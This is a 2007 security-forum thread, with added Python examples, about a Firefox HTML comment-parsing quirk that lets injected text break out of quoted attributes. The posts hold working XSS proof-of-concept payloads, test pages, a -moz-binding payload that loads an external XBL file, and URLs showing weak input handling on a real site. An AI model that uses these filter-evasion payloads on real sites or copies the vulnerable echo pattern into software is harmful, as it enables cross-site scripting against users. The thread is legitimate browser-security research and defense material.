Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Weird comment behavior in FF.
Posted by: tx
Date: June 08, 2007 07:17PM

I was looking at some poorly sanitized vars at istockphoto.com and I came across some weird FF commenting behavior, anyone got any insight/confirmation?

Look at this URL: h++p://www.istockphoto.com/user_view.php?id=1--

for some reason entering [number]-- as the id completely wrecks FF's rendering of the page (FF 2.0.0.4 XP). There doesn't seem to be any reason for this though :\
Viewing source shows a huge chunk of the source commented out until a seemingly arbitrary point. Viewing generated source shows everything as normal.
And it doesn't seem to happen in IE6, confirm?

EDIT: Behavior is reproduced if -- is anywhere in the query string. ie: http://www.istockphoto.com/file_search.php?action=file--&clearanceBin=%22%3E , http://www.istockphoto.com/file_search.php?action=file&clearanceBin=--%22%3E

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/08/2007 07:21PM by tx.

Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 09, 2007 01:49PM

Weird!

<!--
iweb5.istockphoto.com / RadwareDB (idb6) was pleased to serve you today.
Current url: www.istockphoto.com/file_search.php?action=file--&clearanceBin=
-->

Looks pretty much like a regex bug in FFox - did you already report it?

Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 09, 2007 10:26PM

weird indeed.

so you can insert text between the -- and the > when closing a comment...

firefox also seems to try to intelligently handle nested comments, though only to a depth of one, e.g. a comment inside a comment. furthermore, the nested comment can begin without the <! , only the -- is needed. if i understand correctly, this is what is happening on the istockphoto.com page. it boils down to:

<!--
x--y
-->
z--w>

so line one starts the outside comment, line two starts the nested comment with the --, line three ends the nested comment (rather than the outside comment like i would expect), and line 4 ends the outside comment.

apparently you can also insert text between the <! and the -- at the beginning of a comment, however this messes up the nesting, so doing this in line one of the above example would cause the second line to not be treated as the opening of a nested comment.

note that you need a doctype for this to work properly. when i tried to reproduce this bug without one, i wasn't getting anything. with "HTML 4.01 Transitional" and "XHTML 1.1" it reproduced just fine.

i'm probably wrong but it seems this could be used to escape from a double quoted attribute that filters for double quotes. sort of like a multibyte injection, but the opening double quote is getting tampered with rather than the closing. for example, say a page had two injection points (three actually), the first injection being inserted into a comment at the top of the page which filters "<>, the second injection being inserted into an attribute of any field that is wrapped in double quotes which only filters ". so into the first you inject -- and into the second you inject --><div name= . if your third injection point is now following the next double quote, you might be able to actually do something there.

granted that's a lot of conditions that all have to be met, but theoretically it seems like it could work.

Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 10, 2007 03:06AM

That is one cool browser bug, wow nice stuff.

Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 13, 2007 07:56AM

Really interesting find!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 13, 2007 08:15AM

I did a little bit more playing around with it and turns out you only need 2 injection points - one in a comment and one in a double quote:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
</head>
<body>
<!-- This is the first injection point: -- -->
<a href="This is the second injection point: --evadefilter><b style=-moz-binding:url('http://www.md5-db.com/STXSS_XBL.xml#loader') /> <a href=test >link</a>
</body>
</html>

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 12:06PM

aah, good thinking Martin... eliminating the third injection point makes it much more useful. unfortunately, i don't see a way of doing it with a single injection that gets reflected to both a comment and to a subsequent attribute field. the close tag must have the > at the end but opening -- cannot have a > anywhere after it or it throws off the nesting.

Re: Weird comment behavior in FF.
Posted by: Anonymous User
Date: June 13, 2007 01:07PM

Interesting thinking, that one can get complex, still it might be done with a mixture of reflected & stored XSS. Would be cool to see this on the XSS sheet, I know it's exotic, but who knows, could come in useful.

Re: Weird comment behavior in FF.
Posted by: tx
Date: June 13, 2007 03:54PM

Wow there's a lot of response on this, excellent.

@thornmaker: It seems to me that opening any query that opens with --some-text> (or something similar) will work to break out of a quoted attribute if the variable is echoed both in the comment and then later in the attribute. I put up a little test page, http://tx.lowtechlive.com/comment.php?url=--end-comment%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Ca%20href=%23

Basically, entering --end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=%23 as the value for $_GET['url'] causes the following html output (edited slightly to avoid linkification):


<!-- First the uri is echoed out, url encoded: url: h+tp://tx.lowtechlive.com/comment.php?url=--end-comment%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Ca%20href=%23 -->
Then the value of the _GET['url'] variable is echoed, replacing any double quotes with the html entity: <a href="--end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=#">Here is the link</a>


And the alert successfully fires.

EDIT: Note that everything between <!-- and --end-comment> is commented out.

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 06/13/2007 04:00PM by tx.
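An added illustration (mine, not tx's PHP page): a Python rendering of the same two-sink pattern the comment.php demo above describes (request URI echoed into an HTML comment after URL-encoding, which leaves "--" intact; the parameter echoed into a double-quoted href with only the double quote entity-encoded), beside a version that encodes each sink for its context. The endpoint name /comment.php, the helper names and the page layout are assumptions; the payload is the one quoted in the post.

```python
import html
from urllib.parse import quote

# Constructed sample: the payload from the single-injection demo above.
PAYLOAD = "--end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=#"


def request_uri(url_value: str) -> str:
    """Constructed request target for a hypothetical /comment.php endpoint,
    percent-encoded the way a client would send it ('-' stays literal)."""
    return "/comment.php?url=" + quote(url_value, safe="")


def vulnerable_page(url_value: str) -> str:
    """The pattern described in the thread: URL-encoding protects the comment
    from '<' and '>' but not from '--', and the attribute sink only replaces
    the double quote, so '>' and '<' reach the attribute untouched."""
    attr = url_value.replace('"', "&quot;")
    return (
        f"<!-- url: {request_uri(url_value)} -->\n"
        f'<a href="{attr}">Here is the link</a>\n'
    )


def comment_safe(s: str) -> str:
    """Percent-encode every byte that is not an ASCII letter or digit, so no
    '--', '>', '<' or '!' can survive inside a comment.  A '%' already present
    becomes '%25' (double-encoded but harmless and reversible)."""
    return "".join(
        chr(b) if b < 128 and chr(b).isalnum() else f"%{b:02X}"
        for b in s.encode("utf-8")
    )


def hardened_page(url_value: str) -> str:
    """Same page with the comment sink made delimiter-free and the attribute
    sink entity-encoded for '&', '<', '>', '"' and the single quote."""
    return (
        f"<!-- url: {comment_safe(request_uri(url_value))} -->\n"
        f'<a href="{html.escape(url_value, quote=True)}">Here is the link</a>\n'
    )


def comment_body(page: str) -> str:
    """Text between the first '<!--' and the first '-->' (used for checks)."""
    start = page.index("<!--") + 4
    return page[start:page.index("-->", start)]


if __name__ == "__main__":
    print(vulnerable_page(PAYLOAD))
    print(hardened_page(PAYLOAD))
```

The check that matters for the comment sink is not "were < and > encoded" but "can any delimiter of a comment declaration appear": `comment_body(hardened_page(PAYLOAD))` contains neither "--" nor ">", while the vulnerable version still carries "--end-comment". The more robust fix is to not echo request data into comments at all.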

Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 07:23PM

@tx: nice! so it can be done with a single injection reflected twice.

however, that will only work if, as in the demo page you provide, the > character is url encoded when reflected in the comment, and not url encoded when reflected in the attribute. I'm still looking for a way to make it work when the reflected text is the exact same in both instances. wouldn't this be a more likely situation?

Re: Weird comment behavior in FF.
Posted by: tx
Date: June 13, 2007 08:43PM

The thing is, imho, if < or > aren't filtered out the first time, then the comment could just be ended with --> , which kind of makes it a moot point.

Example (this page doesn't url encode the variable): h+tp://tx.lowtechlive.com/comment_no_enc.php?url=--%3E%20%3Cimg%20src=333%20onerror=alert(1)%3E%20%3C!--%20--


That uses this query:
--> <img src=333 onerror=alert(1)> <!-- --

It successfully alerts twice and breaks out of the quoted attribute, but it's really just a fancy way of going --><script>whatever();</script>

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/13/2007 08:46PM by tx.

Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 13, 2007 09:11PM

I agree with you. if the > isn't filtered from the commented portion, then you can just do your injection there like your page demonstrates. what i was trying to get at earlier was to have the injection reflected twice, with the exact same text reflected, but where the -- was being interpreted as a comment still so that everything is commented out until where the injection is reflected the second time... basically the -- needs to be used as an open tag in one place and as part of a close tag in the next. i would like to try some fuzzing on this before I decide it's not possible, but from what i've tested so far, no dice. probably, the best we are going to get is martin's variation with two injections, or your variation with just one. still, very cool.



Edited 1 time(s). Last edit at 06/13/2007 09:12PM by thornmaker.

Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 14, 2007 05:05AM

thornmaker - it is doable:

2 injection points
IJ1 is inside a comment and encodes < and >
IJ2 is a double-quoted attribute that doesn't encode < and >

Injection: test --> <script>alert(1)</script>

At IJ1 this will look like: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
Whilst at IJ2 it will be: test --> <script>alert(1)</script>

An example of a final page rendering using this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
</head>
<body>
<!--
INJECTION #1: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
-->

INJECTION #2: <a href="test --> <script>alert(1)</script>">This is a link</a>
</body>
</html>

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: Weird comment behavior in FF.
Posted by: Martin
Date: June 14, 2007 10:16AM

Ok, in addition to the previous post I think I worked out some more about how Firefox is handling comments. Apologies if you already knew this - I didn't!

The symbol Firefox uses for start of comment is not "<!--" it is purely "<!" and the close tag for comments is ">"

Therefore:

<! this is a comment >

is rendered as a valid Firefox comment.

However, there are some strange things going on!

Here's another test page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
</head>
<body>

[Comment 1]
<! comment #1 >
<br/>
[End of Comment 1]

<br/>
[Comment 2]
<!--
Comment #2
-->
<br/>
[End of Comment 2]

<br/>
[Comment 3]
<!
Comment #3
--
Comment #3 Part 2
>
<br/>
[End of Comment 3]

<br/>
[Comment 4]
<!
Comment #4
--
Comment #4 Part 2
-->
<br/>
[End of Comment 4]

<br/>
[Comment 5]
<!--
Comment #5
--
Comment #5 Part 2 (Nested)
-->
Comment #5 Part 3
-->
<br/>
[End of Comment 5]

<br/>
[Comment 6]
<!--
Comment #6
--
Comment #6 Part 2 (Nested)
--
Comment #6 Part 3
--
Comment #6 Part 4
--
Comment #6 Part 5
-->
<br/>
[End of Comment 6]

<br/>
[Comment 7]
<!--
Comment #7
--
>
-->
<br/>
[End of Comment 7]

</body>
</html>

I'm still trying to work out some rules for how this all works!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: Weird comment behavior in FF.
Posted by: thornmaker
Date: June 14, 2007 11:22AM

so you could use a <!--, a <!, or a -- placed somewhere before an injectable attribute to break out of the attribute... and each might be useful in situations where the others are not depending on what's filtered and other content on the page.
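Added example, not from any poster: a Python model of the two comment-delimiting rules this thread contrasts, so a defender can see where a server-side filter and the browser disagree. `legacy_comment_end` is the SGML-style comment-declaration rule that fits every observation above (`<!` opens a declaration, each `--` toggles comment text on or off, text between pairs is dropped, and `>` closes only when not inside a `--` pair); it is an inference from the posts, not a transcription of Gecko's parser. `html5_comment_end` is the simplified modern rule (`<!--` runs to the first `-->`, any other `<!` runs to the first `>`). The sample documents are constructed from thornmaker's four-line case, tx's single-injection page and Martin's IJ1/IJ2 page; function names are mine.

```python
# Constructed inputs, reduced from the examples posted in this thread.
THORNMAKER = "<!--\nx--y\n-->\nz--w>\nvisible"
TX_PAGE = (
    '<!-- url: /comment.php?url=--end-comment%3E%3Cscript%3E -->\n'
    '<a href="--end-comment><script>alert(1)</script><a href=#">Here is the link</a>'
)
MARTIN_PAGE = (
    "<!--\nINJECTION #1: test --&gt; &lt;script&gt;alert(1)&lt;/script&gt;\n-->\n\n"
    'INJECTION #2: <a href="test --> <script>alert(1)</script>">This is a link</a>'
)


def legacy_comment_end(doc: str, start: int) -> int:
    """SGML-style comment declaration (model inferred from the thread):
    '<!' opens, each '--' toggles comment text, '>' closes only outside a
    '--' pair.  Returns the index just past the closing '>', or len(doc)."""
    i, in_text = start + 2, False
    while i < len(doc):
        if doc.startswith("--", i):
            in_text = not in_text
            i += 2
        elif doc[i] == ">" and not in_text:
            return i + 1
        else:
            i += 1
    return len(doc)


def html5_comment_end(doc: str, start: int) -> int:
    """Simplified HTML5 tokenizer rule: '<!--' runs to the first '-->';
    any other '<!' is a 'bogus comment' ending at the first '>'.
    Abruptly closed forms such as '<!-->' and '--!>' are not modelled."""
    if doc.startswith("<!--", start):
        j = doc.find("-->", start + 4)
        return len(doc) if j < 0 else j + 3
    j = doc.find(">", start + 2)
    return len(doc) if j < 0 else j + 1


def comment_spans(doc: str, rule) -> list:
    """(start, end) of every region `rule` treats as a comment.
    '<!DOCTYPE' is a declaration, not a comment, and is skipped."""
    spans, i = [], doc.find("<!")
    while i >= 0:
        if doc[i:i + 9].upper() == "<!DOCTYPE":
            i = doc.find("<!", i + 2)
            continue
        end = rule(doc, i)
        spans.append((i, end))
        i = doc.find("<!", end)
    return spans


def rendered(doc: str, rule) -> str:
    """doc with the comment regions removed: what the parser hands on."""
    out, pos = [], 0
    for start, end in comment_spans(doc, rule):
        out.append(doc[pos:start])
        pos = end
    out.append(doc[pos:])
    return "".join(out)


if __name__ == "__main__":
    for name, rule in (("legacy", legacy_comment_end), ("html5", html5_comment_end)):
        print(f"{name:6} thornmaker -> {rendered(THORNMAKER, rule)!r}")
        print(f"{name:6} tx         -> {rendered(TX_PAGE, rule)!r}")
        print(f"{name:6} martin     -> {rendered(MARTIN_PAGE, rule)!r}")
```

Under the legacy rule both constructed pages hand `<script>` to the tree builder, while under the modern rule the comment closes at the first `-->` and the same text stays inside the attribute. A filter that decides "this value lands in a comment, so only `-->` matters" is therefore making a parser assumption the browser of the day did not share; treating `--`, `>` and `<!` in comment-bound data as delimiters, or keeping request data out of comments entirely, holds under both rules.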

Re: Weird comment behavior in FF.
Posted by: trev
Date: July 07, 2007 05:18PM

Just a note: this is bug 233270 and actually not a bug.
